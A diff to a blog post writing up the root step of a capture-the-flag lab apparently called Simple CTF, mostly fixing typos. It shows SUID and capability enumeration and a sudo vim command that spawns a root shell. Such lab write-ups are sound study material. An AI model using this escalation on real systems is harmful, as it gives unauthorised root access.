AaronBray/AaronBray.github.io/_posts/2025-09-10-SimpleCTF.md

 +USER FLAG!!!!!!!!!!!!!
 _______________________________

-We know need to escalate our privilege in order to gain to root flag looking for ways to get root
+We now need to escalate our privilege in order to gain to root flag Lets look for ways to get root
 Searching:
-:$ find / -type f -perm -04000 -ls 2>/dev/null-- listed files with suid set -- nothing promising :$ getcap -r / 2>/dev/null -- list enabled binary capabilities -- nothing promising
+>:$ find / -type f -perm -04000 -ls 2>/dev/null-- listed files with suid set -- nothing promising was found
+>:$ getcap -r / 2>/dev/null -- list enabled binary capabilities -- nothing promising was found
-:$ sudo -l --shows that VIM commands are allowed to be run as sudo
+>:$ sudo -l -- shows that VIM commands are allowed to be run as sudo

 Searching [FTGObins](https://gtfobins.github.io/) shows that we can use VIM to escalate our privilege:

 Running the commnd:
-:$ sudo vim -c ':!/bin/sh'
+>:$ sudo vim -c ':!/bin/sh'

 We can see this command was accepted and we are now the root user Lets move into the root directory and capture the root flag

-We now have the root.txt flag file lsited in the /root directory able to be accessed When we cat out this file we can see that we have now uncovered the root flag!
+We now have the root.txt flag file shown in the /root directory accessible When we cat out this file we can see that we have now uncovered the root flag!

 +ROOT FLAG!!!!!!!!!